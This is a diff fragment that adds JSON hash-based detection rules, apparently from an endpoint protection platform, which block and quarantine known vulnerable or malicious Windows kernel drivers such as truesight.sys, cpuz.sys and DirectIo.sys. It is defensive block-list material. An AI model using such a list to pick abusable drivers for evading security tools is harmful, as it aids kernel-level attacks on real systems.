+ "value": "39ae7a7a20366cb6b2e6cfec3476429249de837cfb0e1245237d31e4c4e87fc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e65a468-a620-5648-871b-283f75f99abe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828672Z",
+ "creation_date": "2026-03-23T11:45:31.828674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc424dc1d8b745d6b961f5c616f641b01edfa06ff1c8c185067b2d7ca9285137",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e678389-face-5180-accf-a05378066430",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489602Z",
+ "creation_date": "2026-03-23T11:45:31.489605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c74b01e02e2a18c353bb67808efbfa766e54f441bf7dbb91bad490e8b58a72d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e722cbb-068d-5332-9978-3d03d2763f51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818807Z",
+ "creation_date": "2026-03-23T11:45:30.818809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2418301336cd89b7e3bda2f68bc1aa63b8ea9a75da7a3b40a9ee0a9058789f63",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e79d08b-fd5f-5223-915d-a88da7a576b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151362Z",
+ "creation_date": "2026-03-23T11:45:31.151365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151373Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b80b00d7c1178f9e8568daf72095b3731f02a655872837a98f3afae066934d74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e886ee4-27d5-54c6-aea8-4a0020c1ff72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493383Z",
+ "creation_date": "2026-03-23T11:45:31.493385Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a01d3842dbeed32beb3ba1b0b5578d4a26a85336f9a75497b4329e6685ea8577",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e9831e8-7780-5df4-a989-4a1fe7813edd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150125Z",
+ "creation_date": "2026-03-23T11:45:31.150127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8face68c6d53a61e5bc75d981fc7639dd861859e8beb7180ad7eb0c12791a6cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9e9c34c0-155f-55c5-bd96-cc05d8b0f263",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829897Z",
+ "creation_date": "2026-03-23T11:45:30.829899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a678dd8c37435d5b606b41b6232b8a7232f981a1c2295ec4863649e362f8e7e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ea1e404-a6ef-5776-b0f6-d0d757c8c277",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143475Z",
+ "creation_date": "2026-03-23T11:45:31.143477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf1330ec9304e857d70135e29e91cf0b7926e41a9c34f2d1a798fcf46f573174",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ec2e2ed-3250-5706-92e9-a608917a39ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977898Z",
+ "creation_date": "2026-03-23T11:45:29.977901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217",
+ "comment": "Malicious Kernel Driver (aka daxin_blank6.sys) [https://www.loldrivers.io/drivers/3d1439e9-9a7d-497a-8c6c-74513f825d6a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9eccebb1-ae20-556d-8367-1b093141198c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142255Z",
+ "creation_date": "2026-03-23T11:45:31.142257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142263Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f17fa26ccde612a01707f58fa640d520c53aa53631883ade129c675b51c4e0f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9edab224-c394-5d1d-a138-fc171d26521e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154129Z",
+ "creation_date": "2026-03-23T11:45:31.154131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e65f7e35b7f76f2a6f1e467380f6b988313d78f80e129c566b0a227cdcb80f4c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ee02884-8464-5bc8-8f2d-f55ba9395af8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983721Z",
+ "creation_date": "2026-03-23T11:45:29.983723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4",
+ "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv.sys) [https://www.loldrivers.io/drivers/b72f7335-6f27-42c5-85f5-ed7eb9016eac/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ee16c4c-00c3-5628-a2f9-ecff75172685",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473114Z",
+ "creation_date": "2026-03-23T11:45:31.473118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47c4e9795cd672e4df7905d531ec7a435b7d6487eb3cd1af03cbd9338fda4b80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ee422db-5a0a-5212-bf95-d0b61158c11c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620935Z",
+ "creation_date": "2026-03-23T11:45:29.620937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620950Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6948480954137987a0be626c24cf594390960242cd75f094cd6aaa5c2e7a54fa",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ef80e90-28ce-5360-b276-7c91c5cebb42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827734Z",
+ "creation_date": "2026-03-23T11:45:30.827736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e32ad2cc81d76e1fc4343565d192822d3c07a1666614ef9eed373d1a8718f47",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f1c7bad-adc5-5862-b9c3-6f644b7889c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488009Z",
+ "creation_date": "2026-03-23T11:45:31.488011Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ced544aec0b87127e0548af7825a40593152636f7cbbdcd714fbb9f6be1a835d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f2582b9-4dfb-5c8a-9304-dac83c6d4427",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473455Z",
+ "creation_date": "2026-03-23T11:45:30.473458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473467Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58cb5439e34be4ede6d93c463cb0433c99a100a1c06fca777eda751fd72c07bf",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f3e64f7-cf44-5122-8b0e-6bbf7cece4e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479511Z",
+ "creation_date": "2026-03-23T11:45:30.479514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61bd9a26c01371d865e681f6354853dc0e27b1064906cd99b15220098be6e88d",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f43bddf-9720-5ed2-a68c-defa3ca22e3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981857Z",
+ "creation_date": "2026-03-23T11:45:29.981859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981864Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9",
+ "comment": "Vulnerable Kernel Driver (aka DirectIo.sys) [https://www.loldrivers.io/drivers/ce2d41fd-908f-414c-b6b5-338298f425b8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f5617c0-7538-55ca-bf2c-cbb7458b914c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817151Z",
+ "creation_date": "2026-03-23T11:45:31.817153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e1688a6c7d649ae588ef418fc3732a910a5e9c0d0be02b1f9ea00a0af8cff79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f61f096-86e5-5770-b903-f2a833916d78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500203Z",
+ "creation_date": "2026-03-23T11:45:31.500206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500214Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1f4d2141dbe75a2df46858bc9a4fca9a0f40341e1176a06c0053e4c5b3f3ddd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f76f804-a448-5193-88ee-190fcf61212c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820842Z",
+ "creation_date": "2026-03-23T11:45:30.820844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71c0ce3d33352ba6a0fb26e274d0fa87dc756d2473e104e0f5a7d57fab8a5713",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
